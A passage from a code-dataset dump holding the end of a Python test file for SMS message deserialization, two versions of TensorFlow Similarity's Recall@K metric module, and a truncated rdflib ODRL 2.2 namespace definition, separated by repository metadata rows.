    # decoded from base64/hex into raw bytes.
    response = MockResponse(
        """
        {
            "type": "mo_binary",
            "to": "54321",
            "from": "123456789",
            "id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
            "sent_at": "2016-12-03T16:24:23.318Z",
            "received_at": "2016-12-05T16:24:23.318Z",
            "body": "AwE=",
            "udh": "00010203",
            "operator": "48271"
        }
        """)
    result = deserialize.mo_sms(response)
    assert_is_instance(result, api.MoBinarySms)
    assert_equal('54321', result.recipient)
    assert_equal('123456789', result.sender)
    assert_equal('b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id)
    assert_equal(b'\x03\x01', result.body)
    assert_equal(b'\x00\x01\x02\x03', result.udh)
    assert_equal(
        datetime(2016, 12, 3, 16, 24, 23, 318000, UTC), result.sent_at
    )
    assert_equal(
        datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.received_at
    )
    assert_equal('48271', result.operator)
def test_mo_text_sms():
    # An mo_text payload with all optional fields (keyword, operator,
    # sent_at) populated deserializes into MoTextSms.
    response = MockResponse(
        """
        {
            "type": "mo_text",
            "to": "12345",
            "from": "987654321",
            "id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
            "sent_at": "2016-12-03T16:24:23.318Z",
            "received_at": "2016-12-05T16:24:23.318Z",
            "body": "Hello, world!",
            "keyword": "kivord",
            "operator": "31110"
        }
        """)
    result = deserialize.mo_sms(response)
    assert_is_instance(result, api.MoTextSms)
    assert_equal('12345', result.recipient)
    assert_equal('987654321', result.sender)
    assert_equal(
        'b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id
    )
    assert_equal('Hello, world!', result.body)
    assert_equal("kivord", result.keyword)
    assert_equal(
        datetime(2016, 12, 3, 16, 24, 23, 318000, UTC), result.sent_at
    )
    assert_equal(
        datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.received_at
    )
def test_mo_text_sms_minimal():
    # An mo_text payload carrying only the required fields still
    # deserializes; optional fields are simply absent.
    response = MockResponse(
        """
        {
            "type": "mo_text",
            "to": "12345",
            "from": "987654321",
            "id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
            "received_at": "2016-12-05T16:24:23.318Z",
            "body": "Hello, world!"
        }
        """)
    result = deserialize.mo_sms(response)
    assert_is_instance(result, api.MoTextSms)
    assert_equal('12345', result.recipient)
    assert_equal('987654321', result.sender)
    assert_equal(
        'b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id
    )
    assert_equal('Hello, world!', result.body)
    assert_equal(
        datetime(2016, 12, 5, 16, 24, 23, 318000, UTC),
        result.received_at
    )
@raises(exceptions.UnexpectedResponseException)
def test_mo_text_sms_invalid_date_time():
    # A malformed ISO-8601 timestamp ("...23318Z") must be reported as an
    # unexpected response, not leak a parser error.
    response = MockResponse(
        """
        {
            "type": "mo_text",
            "to": "12345",
            "from": "987654321",
            "id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
            "received_at": "2016-12-05T16:24:23318Z",
            "body": "Hello, world!"
        }
        """)
    deserialize.mo_sms(response)
@raises(exceptions.UnexpectedResponseException)
def test_mo_unknown_sms():
    """An MO message with an unrecognized type is rejected."""
    deserialize.mo_sms(MockResponse('{"type": "whatever"}'))
def test_read_inbounds_page():
    # A paged inbound listing deserializes with paging metadata and one
    # typed MO message (text vs. binary) per entry.
    response = MockResponse(
        """
        {
            "count": 9,
            "page": 3,
            "inbounds": [
                {
                    "type": "mo_text",
                    "to": "12345",
                    "from": "987654321",
                    "id": "b88b4cee",
                    "received_at": "2016-12-05T16:24:23.318Z",
                    "body": "Hello, world!"
                },
                {
                    "type": "mo_binary",
                    "to": "54321",
                    "from": "123456789",
                    "id": "cd748dd93b60",
                    "sent_at": "2016-12-03T16:24:23.318Z",
                    "received_at": "2016-12-05T16:24:23.318Z",
                    "body": "AwE=",
                    "udh": "00010203"
                }
            ],
            "page_size": 2
        }
        """)
    result = deserialize.inbounds_page(response)
    assert_equal(2, result.size)
    assert_equal(3, result.page)
    assert_equal(9, result.total_size)
    assert_equal(2, len(result.content))
    assert_is_instance(result.content[0], api.MoTextSms)
    assert_equal('b88b4cee', result.content[0].message_id)
    assert_is_instance(result.content[1], api.MoBinarySms)
    assert_equal('cd748dd93b60', result.content[1].message_id)
| 16,850 | 6 | 576 |
8a2c28fd9c3b626ba88c7c0aa37a2c2f9aae24a5 | 3,390 | py | Python | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 706 | 2021-09-04T02:11:05.000Z | 2022-03-31T13:29:14.000Z | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 119 | 2021-09-01T22:32:40.000Z | 2022-03-30T22:39:27.000Z | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 57 | 2021-09-04T02:11:14.000Z | 2022-03-31T13:29:15.000Z | # Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from .retrieval_metric import RetrievalMetric
from tensorflow_similarity.types import FloatTensor, IntTensor, BoolTensor
class RecallAtK(RetrievalMetric):
    """The metric learning version of Recall@K.
    A query is counted as a positive when ANY lookup in top K match the query
    class, 0 otherwise.
    Args:
        name: Name associated with the metric object, e.g., recall@5
        canonical_name: The canonical name associated with metric,
        e.g., recall@K
        k: The number of nearest neighbors over which the metric is computed.
        distance_threshold: The max distance below which a nearest neighbor is
        considered a valid match.
        average: {'micro', 'macro'} Determines the type of averaging performed
        over the queries.
        * 'micro': Calculates metrics globally over all queries.
        * 'macro': Calculates metrics for each label and takes the unweighted
        mean.
    """
    def compute(
        self,
        *,  # keyword only arguments see PEP-570
        query_labels: IntTensor,
        match_mask: BoolTensor,
        **kwargs,
    ) -> FloatTensor:
        """Compute the metric
        Args:
            query_labels: A 1D tensor of the labels associated with the
            embedding queries.
            match_mask: A 2D mask where a 1 indicates a match between the
            jth query and the kth neighbor and a 0 indicates a mismatch.
            **kwargs: Additional compute args.
        Returns:
            A rank 0 tensor containing the metric.
        """
        self._check_shape(query_labels, match_mask)
        # Only the K nearest neighbors contribute to the metric.
        k_slice = match_mask[:, : self.k]
        # A query is a hit (1.0) if ANY of its top-K neighbors matches.
        match_indicator = tf.math.reduce_any(k_slice, axis=1)
        match_indicator = tf.cast(match_indicator, dtype="float")
        if self.average == "micro":
            # Global mean over all queries.
            recall_at_k = tf.math.reduce_mean(match_indicator)
        elif self.average == "macro":
            # Unweighted mean of the per-class recalls.
            per_class_metrics = 0
            class_labels = tf.unique(query_labels)[0]
            # TODO(ovallis): potential slowness.
            for label in class_labels:
                idxs = tf.where(query_labels == label)
                c_slice = tf.gather(match_indicator, indices=idxs)
                per_class_metrics += tf.math.reduce_mean(c_slice)
            recall_at_k = tf.math.divide(per_class_metrics, len(class_labels))
        else:
            raise ValueError(
                f"{self.average} is not a supported average " "option"
            )
        result: FloatTensor = recall_at_k
        return result
| 34.948454 | 78 | 0.646608 | # Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from .retrieval_metric import RetrievalMetric
from tensorflow_similarity.types import FloatTensor, IntTensor, BoolTensor
class RecallAtK(RetrievalMetric):
    """The metric learning version of Recall@K.
    A query is counted as a positive when ANY lookup in top K match the query
    class, 0 otherwise.
    Args:
        name: Name associated with the metric object, e.g., recall@5
        canonical_name: The canonical name associated with metric,
        e.g., recall@K
        k: The number of nearest neighbors over which the metric is computed.
        distance_threshold: The max distance below which a nearest neighbor is
        considered a valid match.
        average: {'micro', 'macro'} Determines the type of averaging performed
        over the queries.
        * 'micro': Calculates metrics globally over all queries.
        * 'macro': Calculates metrics for each label and takes the unweighted
        mean.
    """
    def __init__(self, name: str = "recall", k: int = 5, **kwargs) -> None:
        # Default the canonical name unless the caller provided one.
        if "canonical_name" not in kwargs:
            kwargs["canonical_name"] = "recall@k"
        super().__init__(name=name, k=k, **kwargs)
    def compute(
        self,
        *,  # keyword only arguments see PEP-570
        query_labels: IntTensor,
        match_mask: BoolTensor,
        **kwargs,
    ) -> FloatTensor:
        """Compute the metric
        Args:
            query_labels: A 1D tensor of the labels associated with the
            embedding queries.
            match_mask: A 2D mask where a 1 indicates a match between the
            jth query and the kth neighbor and a 0 indicates a mismatch.
            **kwargs: Additional compute args.
        Returns:
            A rank 0 tensor containing the metric.
        """
        self._check_shape(query_labels, match_mask)
        # Only the K nearest neighbors contribute to the metric.
        k_slice = match_mask[:, : self.k]
        # A query is a hit (1.0) if ANY of its top-K neighbors matches.
        match_indicator = tf.math.reduce_any(k_slice, axis=1)
        match_indicator = tf.cast(match_indicator, dtype="float")
        if self.average == "micro":
            # Global mean over all queries.
            recall_at_k = tf.math.reduce_mean(match_indicator)
        elif self.average == "macro":
            # Unweighted mean of the per-class recalls.
            per_class_metrics = 0
            class_labels = tf.unique(query_labels)[0]
            # TODO(ovallis): potential slowness.
            for label in class_labels:
                idxs = tf.where(query_labels == label)
                c_slice = tf.gather(match_indicator, indices=idxs)
                per_class_metrics += tf.math.reduce_mean(c_slice)
            recall_at_k = tf.math.divide(per_class_metrics, len(class_labels))
        else:
            raise ValueError(
                f"{self.average} is not a supported average " "option"
            )
        result: FloatTensor = recall_at_k
        return result
| 195 | 0 | 27 |
a9c8778b124fe87293be9117678ef66587e179af | 21,994 | py | Python | rdflib/namespace/_ODRL2.py | gtfierro/rdflib | be3d026e9065c8f60f59ac79a70da9f3199f5f43 | [
"BSD-3-Clause"
] | 1 | 2022-02-02T23:04:51.000Z | 2022-02-02T23:04:51.000Z | rdflib/namespace/_ODRL2.py | gtfierro/rdflib | be3d026e9065c8f60f59ac79a70da9f3199f5f43 | [
"BSD-3-Clause"
] | 6 | 2021-11-22T19:10:32.000Z | 2022-01-31T19:16:37.000Z | rdflib/namespace/_ODRL2.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | from rdflib.namespace import DefinedNamespace, Namespace
from rdflib.term import URIRef
class ODRL2(DefinedNamespace):
    """
    ODRL Version 2.2

    The ODRL Vocabulary and Expression defines a set of concepts and terms (the vocabulary) and encoding mechanism
    (the expression) for permissions and obligations statements describing digital content usage based on the ODRL
    Information Model.

    Generated from: https://www.w3.org/ns/odrl/2/ODRL22.ttl
    Date: 2020-05-26 14:20:02.352356
    """

    # Accessing an attribute not declared below raises instead of silently
    # minting a new term in the namespace.
    _fail = True

    # http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
    action: URIRef  # The operation relating to the Asset for which the Rule is being subjected.
    andSequence: URIRef  # The relation is satisfied when each of the Constraints are satisfied in the order specified.
    assignee: URIRef  # The Party is the recipient of the Rule.
    assigneeOf: URIRef  # Identifies an ODRL Policy for which the identified Party undertakes the assignee functional role.
    assigner: URIRef  # The Party is the issuer of the Rule.
    assignerOf: URIRef  # Identifies an ODRL Policy for which the identified Party undertakes the assigner functional role.
    attributedParty: URIRef  # The Party to be attributed.
    attributingParty: URIRef  # The Party who undertakes the attribution.
    compensatedParty: URIRef  # The Party is the recipient of the compensation.
    compensatingParty: URIRef  # The Party that is the provider of the compensation.
    conflict: URIRef  # The conflict-resolution strategy for a Policy.
    consentedParty: URIRef  # The Party who obtains the consent.
    consentingParty: URIRef  # The Party to obtain consent from.
    consequence: URIRef  # Relates a Duty to another Duty, the latter being a consequence of not fulfilling the former.
    constraint: URIRef  # Constraint applied to a Rule
    contractedParty: URIRef  # The Party who is being contracted.
    contractingParty: URIRef  # The Party who is offering the contract.
    dataType: URIRef  # The datatype of the value of the rightOperand or rightOperandReference of a Constraint.
    duty: URIRef  # Relates an individual Duty to a Permission.
    failure: URIRef  # Failure is an abstract property that defines the violation (or unmet) relationship between Rules.
    function: URIRef  # Function is an abstract property whose sub-properties define the functional roles which may be fulfilled by a party in relation to a Rule.
    hasPolicy: URIRef  # Identifies an ODRL Policy for which the identified Asset is the target Asset to all the Rules.
    implies: URIRef  # An Action asserts that another Action is not prohibited to enable its operational semantics.
    includedIn: URIRef  # An Action transitively asserts that another Action that encompasses its operational semantics.
    informedParty: URIRef  # The Party to be informed of all uses.
    informingParty: URIRef  # The Party who provides the inform use data.
    inheritAllowed: URIRef  # Indicates if the Policy entity can be inherited.
    inheritFrom: URIRef  # Relates a (child) policy to another (parent) policy from which terms are inherited.
    inheritRelation: URIRef  # Identifies the type of inheritance.
    leftOperand: URIRef  # The left operand in a constraint expression.
    obligation: URIRef  # Relates an individual Duty to a Policy.
    operand: URIRef  # Operand is an abstract property for a logical relationship.
    operator: URIRef  # The operator function applied to operands of a Constraint
    output: URIRef  # The output property specifies the Asset which is created from the output of the Action.
    partOf: URIRef  # Identifies an Asset/PartyCollection that the Asset/Party is a member of.
    payeeParty: URIRef  # The Party is the recipient of the payment.
    permission: URIRef  # Relates an individual Permission to a Policy.
    profile: URIRef  # The identifier(s) of an ODRL Profile that the Policy conforms to.
    prohibition: URIRef  # Relates an individual Prohibition to a Policy.
    proximity: URIRef  # An value indicating the closeness or nearness.
    refinement: URIRef  # Constraint used to refine the semantics of an Action, or Party/Asset Collection
    relation: URIRef  # Relation is an abstract property which creates an explicit link between an Action and an Asset.
    remedy: URIRef  # Relates an individual remedy Duty to a Prohibition.
    rightOperand: URIRef  # The value of the right operand in a constraint expression.
    rightOperandReference: URIRef  # A reference to a web resource providing the value for the right operand of a Constraint.
    scope: URIRef  # The identifier of a scope that provides context to the extent of the entity.
    source: URIRef  # Reference to a Asset/PartyCollection
    status: URIRef  # the value generated from the leftOperand action or a value related to the leftOperand set as the reference for the comparison.
    target: URIRef  # The target property indicates the Asset that is the primary subject to which the Rule action directly applies.
    timedCount: URIRef  # The number of seconds after which timed metering use of the asset begins.
    trackedParty: URIRef  # The Party whose usage is being tracked.
    trackingParty: URIRef  # The Party who is tracking usage.
    uid: URIRef  # An unambiguous identifier
    undefined: URIRef  # Relates the strategy used for handling undefined actions to a Policy.
    unit: URIRef  # The unit of measurement of the value of the rightOperand or rightOperandReference of a Constraint.
    xone: URIRef  # The relation is satisfied when only one, and not more, of the Constraints is satisfied

    # http://www.w3.org/2002/07/owl#NamedIndividual
    All: URIRef  # Specifies that the scope of the relationship is all of the collective individuals within a context.
    All2ndConnections: URIRef  # Specifies that the scope of the relationship is all of the second-level connections to the Party.
    AllConnections: URIRef  # Specifies that the scope of the relationship is all of the first-level connections of the Party.
    AllGroups: URIRef  # Specifies that the scope of the relationship is all of the group connections of the Party.
    Group: URIRef  # Specifies that the scope of the relationship is the defined group with multiple individual members.
    Individual: URIRef  # Specifies that the scope of the relationship is the single Party individual.
    absolutePosition: URIRef  # A point in space or time defined with absolute coordinates for the positioning of the target Asset.
    absoluteSize: URIRef  # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects of the target Asset.
    absoluteSpatialPosition: URIRef  # The absolute spatial positions of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space for the target Asset to fit.
    absoluteTemporalPosition: URIRef  # The absolute temporal positions in a media stream the target Asset has to fit.
    count: URIRef  # Numeric count of executions of the action of the Rule.
    dateTime: URIRef  # The date (and optional time and timezone) of exercising the action of the Rule. Right operand value MUST be an xsd:date or xsd:dateTime as defined by [[xmlschema11-2]].
    delayPeriod: URIRef  # A time delay period prior to exercising the action of the Rule. The point in time triggering this period MAY be defined by another temporal Constraint combined by a Logical Constraint (utilising the odrl:andSequence operand). Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
    deliveryChannel: URIRef  # The delivery channel used for exercising the action of the Rule.
    device: URIRef  # An identified device used for exercising the action of the Rule.
    elapsedTime: URIRef  # A continuous elapsed time period which may be used for exercising of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
    eq: URIRef  # Indicating that a given value equals the right operand of the Constraint.
    event: URIRef  # An identified event setting a context for exercising the action of the Rule.
    fileFormat: URIRef  # A transformed file format of the target Asset.
    gt: URIRef  # Indicating that a given value is greater than the right operand of the Constraint.
    gteq: URIRef  # Indicating that a given value is greater than or equal to the right operand of the Constraint.
    hasPart: URIRef  # A set-based operator indicating that a given value contains the right operand of the Constraint.
    ignore: URIRef  # The Action is to be ignored and is not part of the policy – and the policy remains valid.
    industry: URIRef  # A defined industry sector setting a context for exercising the action of the Rule.
    invalid: URIRef  # The policy is void.
    isA: URIRef  # A set-based operator indicating that a given value is an instance of the right operand of the Constraint.
    isAllOf: URIRef  # A set-based operator indicating that a given value is all of the right operand of the Constraint.
    isAnyOf: URIRef  # A set-based operator indicating that a given value is any of the right operand of the Constraint.
    isNoneOf: URIRef  # A set-based operator indicating that a given value is none of the right operand of the Constraint.
    isPartOf: URIRef  # A set-based operator indicating that a given value is contained by the right operand of the Constraint.
    language: URIRef  # A natural language used by the target Asset.
    lt: URIRef  # Indicating that a given value is less than the right operand of the Constraint.
    lteq: URIRef  # Indicating that a given value is less than or equal to the right operand of the Constraint.
    media: URIRef  # Category of a media asset setting a context for exercising the action of the Rule.
    meteredTime: URIRef  # An accumulated amount of one to many metered time periods which were used for exercising the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
    neq: URIRef  # Indicating that a given value is not equal to the right operand of the Constraint.
    payAmount: URIRef  # The amount of a financial payment. Right operand value MUST be an xsd:decimal.
    percentage: URIRef  # A percentage amount of the target Asset relevant for exercising the action of the Rule. Right operand value MUST be an xsd:decimal from 0 to 100.
    perm: URIRef  # Permissions take preference over prohibitions.
    policyUsage: URIRef  # Indicates the actual datetime the action of the Rule was exercised.
    product: URIRef  # Category of product or service setting a context for exercising the action of the Rule.
    prohibit: URIRef  # Prohibitions take preference over permissions.
    purpose: URIRef  # A defined purpose for exercising the action of the Rule.
    recipient: URIRef  # The party receiving the result/outcome of exercising the action of the Rule.
    relativePosition: URIRef  # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
    relativeSize: URIRef  # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects - expressed as percentages of full values - of the target Asset.
    relativeSpatialPosition: URIRef  # The relative spatial positions - expressed as percentages of full values - of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space of the target Asset.
    relativeTemporalPosition: URIRef  # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
    resolution: URIRef  # Resolution of the rendition of the target Asset.
    spatial: URIRef  # A named and identified geospatial area with defined borders which is used for exercising the action of the Rule. An IRI MUST be used to represent this value.
    spatialCoordinates: URIRef  # A set of coordinates setting the borders of a geospatial area used for exercising the action of the Rule. The coordinates MUST include longitude and latitude, they MAY include altitude and the geodetic datum.
    support: URIRef  # The Action is to be supported as part of the policy – and the policy remains valid.
    system: URIRef  # An identified computing system used for exercising the action of the Rule.
    systemDevice: URIRef  # An identified computing system or computing device used for exercising the action of the Rule.
    timeInterval: URIRef  # A recurring period of time before the next execution of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
    unitOfCount: URIRef  # The unit of measure used for counting the executions of the action of the Rule.
    version: URIRef  # The version of the target Asset.
    virtualLocation: URIRef  # An identified location of the IT communication space which is relevant for exercising the action of the Rule.

    # http://www.w3.org/2004/02/skos/core#Collection
    # http://www.w3.org/2004/02/skos/core#Concept
    Action: URIRef  # An operation on an Asset.
    Agreement: URIRef  # A Policy that grants the assignee a Rule over an Asset from an assigner.
    Assertion: URIRef  # A Policy that asserts a Rule over an Asset from parties.
    Asset: URIRef  # A resource or a collection of resources that are the subject of a Rule.
    AssetCollection: URIRef  # An Asset that is collection of individual resources
    AssetScope: URIRef  # Scopes for Asset Scope expressions.
    ConflictTerm: URIRef  # Used to establish strategies to resolve conflicts that arise from the merging of Policies or conflicts between Permissions and Prohibitions in the same Policy.
    Constraint: URIRef  # A boolean expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
    Duty: URIRef  # The obligation to perform an Action
    LeftOperand: URIRef  # Left operand for a constraint expression.
    LogicalConstraint: URIRef  # A logical expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
    Offer: URIRef  # A Policy that proposes a Rule over an Asset from an assigner.
    Operator: URIRef  # Operator for constraint expression.
    Party: URIRef  # An entity or a collection of entities that undertake Roles in a Rule.
    PartyCollection: URIRef  # A Party that is a group of individual entities
    PartyScope: URIRef  # Scopes for Party Scope expressions.
    Permission: URIRef  # The ability to perform an Action over an Asset.
    Policy: URIRef  # A non-empty group of Permissions and/or Prohibitions.
    Privacy: URIRef  # A Policy that expresses a Rule over an Asset containing personal information.
    Prohibition: URIRef  # The inability to perform an Action over an Asset.
    Request: URIRef  # A Policy that proposes a Rule over an Asset from an assignee.
    RightOperand: URIRef  # Right operand for constraint expression.
    Rule: URIRef  # An abstract concept that represents the common characteristics of Permissions, Prohibitions, and Duties.
    Set: URIRef  # A Policy that expresses a Rule over an Asset.
    Ticket: URIRef  # A Policy that grants the holder a Rule over an Asset from an assigner.
    UndefinedTerm: URIRef  # Is used to indicate how to support Actions that are not part of any vocabulary or profile in the policy expression system.
    acceptTracking: URIRef  # To accept that the use of the Asset may be tracked.
    adHocShare: URIRef  # The act of sharing the asset to parties in close proximity to the owner.
    aggregate: URIRef  # To use the Asset or parts of it as part of a composite collection.
    annotate: URIRef  # To add explanatory notations/commentaries to the Asset without modifying the Asset in any other way.
    anonymize: URIRef  # To anonymize all or parts of the Asset.
    append: URIRef  # The act of adding to the end of an asset.
    appendTo: URIRef  # The act of appending data to the Asset without modifying the Asset in any other way.
    archive: URIRef  # To store the Asset (in a non-transient form).
    attachPolicy: URIRef  # The act of keeping the policy notice with the asset.
    attachSource: URIRef  # The act of attaching the source of the asset and its derivatives.
    attribute: URIRef  # To attribute the use of the Asset.
    commercialize: URIRef  # The act of using the asset in a business environment.
    compensate: URIRef  # To compensate by transfer of some amount of value, if defined, for using or selling the Asset.
    concurrentUse: URIRef  # To create multiple copies of the Asset that are being concurrently used.
    copy: URIRef  # The act of making an exact reproduction of the asset.
    core: URIRef  # Identifier for the ODRL Core Profile
    delete: URIRef  # To permanently remove all copies of the Asset after it has been used.
    derive: URIRef  # To create a new derivative Asset from this Asset and to edit or modify the derivative.
    digitize: URIRef  # To produce a digital copy of (or otherwise digitize) the Asset from its analogue form.
    display: URIRef  # To create a static and transient rendition of an Asset.
    distribute: URIRef  # To supply the Asset to third-parties.
    ensureExclusivity: URIRef  # To ensure that the Rule on the Asset is exclusive.
    execute: URIRef  # To run the computer program Asset.
    export: URIRef  # The act of transforming the asset into a new form.
    extract: URIRef  # To extract parts of the Asset and to use it as a new Asset.
    extractChar: URIRef  # The act of extracting (replicating) unchanged characters from the asset.
    extractPage: URIRef  # The act of extracting (replicating) unchanged pages from the asset.
    extractWord: URIRef  # The act of extracting (replicating) unchanged words from the asset.
    give: URIRef  # To transfer the ownership of the Asset to a third party without compensation and while deleting the original asset.
    grantUse: URIRef  # To grant the use of the Asset to third parties.
    include: URIRef  # To include other related assets in the Asset.
    index: URIRef  # To record the Asset in an index.
    inform: URIRef  # To inform that an action has been performed on or in relation to the Asset.
    install: URIRef  # To load the computer program Asset onto a storage device which allows operating or running the Asset.
    lease: URIRef  # The act of making available the asset to a third-party for a fixed period of time with exchange of value.
    lend: URIRef  # The act of making available the asset to a third-party for a fixed period of time without exchange of value.
    license: URIRef  # The act of granting the right to use the asset to a third-party.
    modify: URIRef  # To change existing content of the Asset. A new asset is not created by this action.
    move: URIRef  # To move the Asset from one digital location to another including deleting the original copy.
    nextPolicy: URIRef  # To grant the specified Policy to a third party for their use of the Asset.
    obtainConsent: URIRef  # To obtain verifiable consent to perform the requested action in relation to the Asset.
    pay: URIRef  # The act of paying a financial amount to a party for use of the asset.
    play: URIRef  # To create a sequential and transient rendition of an Asset.
    present: URIRef  # To publicly perform the Asset.
    preview: URIRef  # The act of providing a short preview of the asset.
    print: URIRef  # To create a tangible and permanent rendition of an Asset.
    read: URIRef  # To obtain data from the Asset.
    reproduce: URIRef  # To make duplicate copies the Asset in any material form.
    reviewPolicy: URIRef  # To review the Policy applicable to the Asset.
    secondaryUse: URIRef  # The act of using the asset for a purpose other than the purpose it was intended for.
    sell: URIRef  # To transfer the ownership of the Asset to a third party with compensation and while deleting the original asset.
    share: URIRef  # The act of the non-commercial reproduction and distribution of the asset to third-parties.
    shareAlike: URIRef  # The act of distributing any derivative asset under the same terms as the original asset.
    stream: URIRef  # To deliver the Asset in real-time.
    synchronize: URIRef  # To use the Asset in timed relations with media (audio/visual) elements of another Asset.
    textToSpeech: URIRef  # To have a text Asset read out loud.
    transfer: URIRef  # To transfer the ownership of the Asset in perpetuity.
    transform: URIRef  # To convert the Asset into a different format.
    translate: URIRef  # To translate the original natural language of an Asset into another natural language.
    uninstall: URIRef  # To unload and delete the computer program Asset from a storage device and disable its readiness for operation.
    use: URIRef  # To use the Asset
    watermark: URIRef  # To apply a watermark to the Asset.
    write: URIRef  # The act of writing to the Asset.
    writeTo: URIRef  # The act of adding data to the Asset.

    # Valid non-python identifiers
    # (terms that cannot be declared as class attributes, e.g. Python
    # keywords and fragment identifiers; exposed via the _extras hook)
    _extras = [
        "and",
        "or",
        "#actionConcepts",
        "#actions",
        "#actionsCommon",
        "#assetConcepts",
        "#assetParty",
        "#assetRelations",
        "#assetRelationsCommon",
        "#conflictConcepts",
        "#constraintLeftOperandCommon",
        "#constraintLogicalOperands",
        "#constraintRelationalOperators",
        "#constraintRightOpCommon",
        "#constraints",
        "#deprecatedTerms",
        "#duties",
        "#logicalConstraints",
        "#partyConcepts",
        "#partyRoles",
        "#partyRolesCommon",
        "#permissions",
        "#policyConcepts",
        "#policySubClasses",
        "#policySubClassesCommon",
        "#prohibitions",
        "#ruleConcepts",
    ]

    # Base IRI every term above is resolved against.
    _NS = Namespace("http://www.w3.org/ns/odrl/2/")
| 83.310606 | 329 | 0.747067 | from rdflib.namespace import DefinedNamespace, Namespace
from rdflib.term import URIRef
class ODRL2(DefinedNamespace):
"""
ODRL Version 2.2
The ODRL Vocabulary and Expression defines a set of concepts and terms (the vocabulary) and encoding mechanism
(the expression) for permissions and obligations statements describing digital content usage based on the ODRL
Information Model.
Generated from: https://www.w3.org/ns/odrl/2/ODRL22.ttl
Date: 2020-05-26 14:20:02.352356
"""
_fail = True
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
action: URIRef # The operation relating to the Asset for which the Rule is being subjected.
andSequence: URIRef # The relation is satisfied when each of the Constraints are satisfied in the order specified.
assignee: URIRef # The Party is the recipient of the Rule.
assigneeOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assignee functional role.
assigner: URIRef # The Party is the issuer of the Rule.
assignerOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assigner functional role.
attributedParty: URIRef # The Party to be attributed.
attributingParty: URIRef # The Party who undertakes the attribution.
compensatedParty: URIRef # The Party is the recipient of the compensation.
compensatingParty: URIRef # The Party that is the provider of the compensation.
conflict: URIRef # The conflict-resolution strategy for a Policy.
consentedParty: URIRef # The Party who obtains the consent.
consentingParty: URIRef # The Party to obtain consent from.
consequence: URIRef # Relates a Duty to another Duty, the latter being a consequence of not fulfilling the former.
constraint: URIRef # Constraint applied to a Rule
contractedParty: URIRef # The Party who is being contracted.
contractingParty: URIRef # The Party who is offering the contract.
dataType: URIRef # The datatype of the value of the rightOperand or rightOperandReference of a Constraint.
duty: URIRef # Relates an individual Duty to a Permission.
failure: URIRef # Failure is an abstract property that defines the violation (or unmet) relationship between Rules.
function: URIRef # Function is an abstract property whose sub-properties define the functional roles which may be fulfilled by a party in relation to a Rule.
hasPolicy: URIRef # Identifies an ODRL Policy for which the identified Asset is the target Asset to all the Rules.
implies: URIRef # An Action asserts that another Action is not prohibited to enable its operational semantics.
includedIn: URIRef # An Action transitively asserts that another Action that encompasses its operational semantics.
informedParty: URIRef # The Party to be informed of all uses.
informingParty: URIRef # The Party who provides the inform use data.
inheritAllowed: URIRef # Indicates if the Policy entity can be inherited.
inheritFrom: URIRef # Relates a (child) policy to another (parent) policy from which terms are inherited.
inheritRelation: URIRef # Identifies the type of inheritance.
leftOperand: URIRef # The left operand in a constraint expression.
obligation: URIRef # Relates an individual Duty to a Policy.
operand: URIRef # Operand is an abstract property for a logical relationship.
operator: URIRef # The operator function applied to operands of a Constraint
output: URIRef # The output property specifies the Asset which is created from the output of the Action.
partOf: URIRef # Identifies an Asset/PartyCollection that the Asset/Party is a member of.
payeeParty: URIRef # The Party is the recipient of the payment.
permission: URIRef # Relates an individual Permission to a Policy.
profile: URIRef # The identifier(s) of an ODRL Profile that the Policy conforms to.
prohibition: URIRef # Relates an individual Prohibition to a Policy.
proximity: URIRef # An value indicating the closeness or nearness.
refinement: URIRef # Constraint used to refine the semantics of an Action, or Party/Asset Collection
